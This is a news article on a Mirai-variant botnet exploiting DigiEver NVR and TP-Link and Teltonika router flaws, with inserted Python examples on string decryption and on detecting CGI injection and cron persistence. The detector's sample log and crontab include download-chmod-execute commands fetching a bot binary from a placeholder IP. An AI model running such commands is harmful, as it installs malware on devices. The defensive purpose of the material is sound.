
Botnet Exploits NVR and TP-Link Router Vulnerabilities

New Mirai Variant Unleashes Wave of Attacks on IoT Devices

A newly discovered Mirai-based botnet is exploiting vulnerabilities in a range of internet-connected devices: a still-unpatched flaw in DigiEver DS-2105 Pro Network Video Recorders (NVRs), and older, already-disclosed vulnerabilities in TP-Link routers and Teltonika RUT9XX routers. The campaign, which began in September and intensified in November, highlights the ongoing threat posed by IoT vulnerabilities and the continual evolution of Mirai-derived malware.

The attacks leverage a previously documented but unpatched remote code execution (RCE) vulnerability in DigiEver NVRs, targeting the '/cgi-bin/cgi_main.cgi' URI. The flaw, similar to one presented by TXOne researcher Ta-Lun Yen at DefCamp 2022 in Bucharest, Romania, lets attackers inject operating-system commands through improperly validated user input passed to that CGI handler. “The issue affects multiple DVR devices,” Yen said at the conference. A video of his presentation is available online.

Exploiting Multiple Vulnerabilities

Beyond the DigiEver flaw, this Mirai variant also exploits CVE-2023-1389 in TP-Link devices and CVE-2018-17532 in Teltonika RUT9XX routers. Carrying several exploits at once widens the pool of devices the botnet can absorb and shows its operators actively maintaining it rather than reusing a single old vector.

Akamai researchers, who first observed the intensified attacks in mid-November, describe the malware as notable for its use of XOR and ChaCha20 to decrypt its embedded strings and configuration, and for its broad targeting of x86, ARM, and MIPS architectures. “Although employing complex decryption methods isn’t new, it suggests evolving tactics, techniques, and procedures among Mirai-based botnet operators,” Akamai comments in its report. “This is mostly notable because many Mirai-based botnets still depend on the original string obfuscation logic from recycled code that was included in the original Mirai malware source code release,” they add.
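To make the contrast Akamai draws concrete, the following is an added example (not code from the article, from Akamai's report, or from the variant itself): the string obfuscation routine from the leaked original Mirai source, reproduced from its published `table.c` logic with the well-known key 0xdeadbeef, beside a ChaCha20 keystream routine written from RFC 8439 of the kind an analyst needs once a sample moves to a real cipher. The sample strings, key and nonce are constructed for the demo and are not taken from any binary.

```python
"""Added example (not from the article or Akamai's report).

Assumptions: the XOR routine mirrors the leaked Mirai table.c logic (uint32
key 0xdeadbeef applied byte-by-byte); the ChaCha20 routine follows RFC 8439.
Sample strings, key and nonce below are constructed, not from a real sample."""
import struct

MIRAI_TABLE_KEY = 0xDEADBEEF  # value used in the leaked Mirai source (table.c)


def mirai_toggle_obf(data: bytes, key: int = MIRAI_TABLE_KEY) -> bytes:
    """Replicates Mirai's toggle_obf(): XOR each byte with the four key bytes
    in turn. Since XOR is associative, that collapses to one byte
    (0xde ^ 0xad ^ 0xbe ^ 0xef == 0x22), which is why these strings fall to a
    256-key brute force. The routine is its own inverse."""
    k = 0
    for shift in (0, 8, 16, 24):
        k ^= (key >> shift) & 0xFF
    return bytes(b ^ k for b in data)


def _rotl32(v: int, n: int) -> int:
    return ((v << n) | (v >> (32 - n))) & 0xFFFFFFFF


def _quarter_round(s, a, b, c, d):
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF; s[d] = _rotl32(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF; s[b] = _rotl32(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & 0xFFFFFFFF; s[d] = _rotl32(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & 0xFFFFFFFF; s[b] = _rotl32(s[b] ^ s[c], 7)


def chacha20_block(key: bytes, counter: int, nonce: bytes) -> bytes:
    """One 64-byte ChaCha20 keystream block (RFC 8439 section 2.3)."""
    assert len(key) == 32 and len(nonce) == 12
    state = (list(struct.unpack("<4I", b"expand 32-byte k"))
             + list(struct.unpack("<8I", key))
             + [counter & 0xFFFFFFFF]
             + list(struct.unpack("<3I", nonce)))
    w = state[:]
    for _ in range(10):  # 20 rounds = 10 x (column round + diagonal round)
        _quarter_round(w, 0, 4, 8, 12); _quarter_round(w, 1, 5, 9, 13)
        _quarter_round(w, 2, 6, 10, 14); _quarter_round(w, 3, 7, 11, 15)
        _quarter_round(w, 0, 5, 10, 15); _quarter_round(w, 1, 6, 11, 12)
        _quarter_round(w, 2, 7, 8, 13); _quarter_round(w, 3, 4, 9, 14)
    return struct.pack("<16I", *((w[i] + state[i]) & 0xFFFFFFFF for i in range(16)))


def chacha20_xor(key: bytes, nonce: bytes, data: bytes, counter: int = 0) -> bytes:
    """Encrypt or decrypt: XOR data with the keystream starting at `counter`."""
    out = bytearray()
    for i in range(0, len(data), 64):
        ks = chacha20_block(key, counter + i // 64, nonce)
        out.extend(x ^ y for x, y in zip(data[i:i + 64], ks))
    return bytes(out)


def single_byte_xor_candidates(blob: bytes, must_contain: bytes) -> list:
    """The analyst's shortcut against original-Mirai obfuscation: try all 256
    keys and keep the ones whose output contains a known substring. Against
    ChaCha20 output this finds nothing, which is the point of the upgrade."""
    hits = []
    for k in range(256):
        cand = bytes(b ^ k for b in blob)
        if must_contain in cand:
            hits.append((k, cand))
    return hits


# Constructed demonstration data; not strings from any real sample.
SAMPLE_PLAIN = b"/cgi-bin/cgi_main.cgi"
MIRAI_OBFUSCATED = mirai_toggle_obf(SAMPLE_PLAIN)
DEMO_KEY = bytes(range(32))      # constructed key, demo only
DEMO_NONCE = bytes(12)           # constructed nonce, demo only
CHACHA_CIPHERTEXT = chacha20_xor(DEMO_KEY, DEMO_NONCE, SAMPLE_PLAIN)

if __name__ == "__main__":
    print("effective Mirai key byte:", hex(MIRAI_OBFUSCATED[0] ^ SAMPLE_PLAIN[0]))
    print("brute force on Mirai-style blob:", single_byte_xor_candidates(MIRAI_OBFUSCATED, b"cgi-bin"))
    print("brute force on ChaCha20 blob:", single_byte_xor_candidates(CHACHA_CIPHERTEXT, b"cgi-bin"))
    print("ChaCha20 recovered with the key:", chacha20_xor(DEMO_KEY, DEMO_NONCE, CHACHA_CIPHERTEXT))
```

The practical consequence for triage: a sample still using the original table obfuscation gives up its C2 hostnames and attack strings to a one-byte XOR sweep in seconds, whereas a ChaCha20-protected sample forces the analyst to locate the key and nonce in the binary (or hook the decryption routine at runtime) before any strings-based rule can be written.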

The ​Attack Methodology

The attackers use the command injection to download the malware binary from a remote server and then establish persistence by adding cron jobs. Once compromised, devices are used for distributed denial-of-service (DDoS) attacks or to spread the malware further using the botnet's exploit set and stolen credentials. A single input-validation flaw in an inexpensive appliance thus feeds a botnet whose traffic lands on networks that never owned the vulnerable device.
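Two checks a defender can run over data already at hand, written from the article's description of the chain (injection through the NVR's CGI handler, then a cron entry that keeps the bot alive), are shown in this added example; it is not code from the article or from Akamai's report. The access-log lines and crontab are constructed for the demo, the IP addresses and paths are invented, and the specific DigiEver request parameter the variant injects into is deliberately not named, since the page does not give it.

```python
"""Added example (not from the article or Akamai's report).

Flags (1) requests to a CGI handler whose decoded query carries shell
metacharacters or a download-then-run chain, and (2) cron lines that fetch
from the network or execute from world-writable paths. All sample data below
is constructed; hosts, IPs and paths are invented for the demo."""
import re
from urllib.parse import unquote

# Apache/nginx "combined" access log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
CGI_PATH = re.compile(r"/cgi-bin/[^?]+\.cgi", re.IGNORECASE)
# Shell metacharacters (after URL decoding) and the download-then-run idiom
# that Mirai-style loaders use: fetch a binary, chmod it, execute it.
SHELL_META = re.compile(r"[;|`$\n]|%0a", re.IGNORECASE)
DOWNLOAD_EXEC = re.compile(
    r"\b(wget|curl|tftp|ftpget)\b.*?\b(chmod|sh|busybox)\b", re.IGNORECASE | re.DOTALL
)


def flag_cgi_injection(lines):
    """Return (ip, decoded_uri, reasons) for CGI requests carrying injection markers."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        uri = unquote(m.group("uri"))
        if not CGI_PATH.match(uri):
            continue
        reasons = []
        if SHELL_META.search(uri):
            reasons.append("shell metacharacter in query")
        if DOWNLOAD_EXEC.search(uri):
            reasons.append("download-and-execute chain")
        if reasons:
            hits.append((m.group("ip"), uri, reasons))
    return hits


# Persistence: cron entries that pull from the network or run from /tmp-like
# locations are the ones worth a human's attention on an appliance.
CRON_SUSPECT = re.compile(
    r"\b(wget|curl|tftp)\b|https?://|(^|\s|/)(tmp|dev/shm|var/tmp)/", re.IGNORECASE
)


def flag_cron_entries(crontab_text):
    """Return non-comment cron lines matching CRON_SUSPECT."""
    out = []
    for raw in crontab_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if CRON_SUSPECT.search(line):
            out.append(line)
    return out


# Constructed sample data (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Nov/2024:03:12:41 +0000] "GET /cgi-bin/cgi_main.cgi?cmd=status HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [18/Nov/2024:03:13:02 +0000] "GET /cgi-bin/cgi_main.cgi?cmd=status%3Bwget%20http%3A%2F%2F192.0.2.10%2Fbot.mips%20-O%20%2Ftmp%2Fb%3Bchmod%20777%20%2Ftmp%2Fb%3B%2Ftmp%2Fb HTTP/1.1" 200 0 "-" "Hello, world"',
    '203.0.113.9 - - [18/Nov/2024:03:14:10 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]
SAMPLE_CRONTAB = """# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * wget http://192.0.2.10/bot.mips -O /tmp/b && chmod +x /tmp/b && /tmp/b
@reboot /tmp/.x/run.sh
"""

if __name__ == "__main__":
    for ip, uri, why in flag_cgi_injection(SAMPLE_LOG):
        print(f"{ip} {uri}\n    {', '.join(why)}")
    for entry in flag_cron_entries(SAMPLE_CRONTAB):
        print("cron:", entry)
```

The URL decoding before matching is the step people most often skip: the injected payload arrives percent-encoded, so a rule that looks for a literal `;` or `wget` in the raw request line sees nothing. On the device side, most consumer NVRs and routers expose no crontab to the owner at all, so the cron check is realistic for a compromised Linux host used as a relay, or for a firmware image pulled off a suspect device for offline inspection.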

Indicators of compromise (IoCs) and YARA rules for detection and blocking are available in the Akamai report. Timely patching and basic network hygiene (no management interfaces exposed to the internet, default credentials changed) are what actually blunt campaigns like this one. For U.S. consumers, this underscores the importance of regularly updating firmware on all internet-connected devices and retiring devices whose vendors no longer ship fixes.
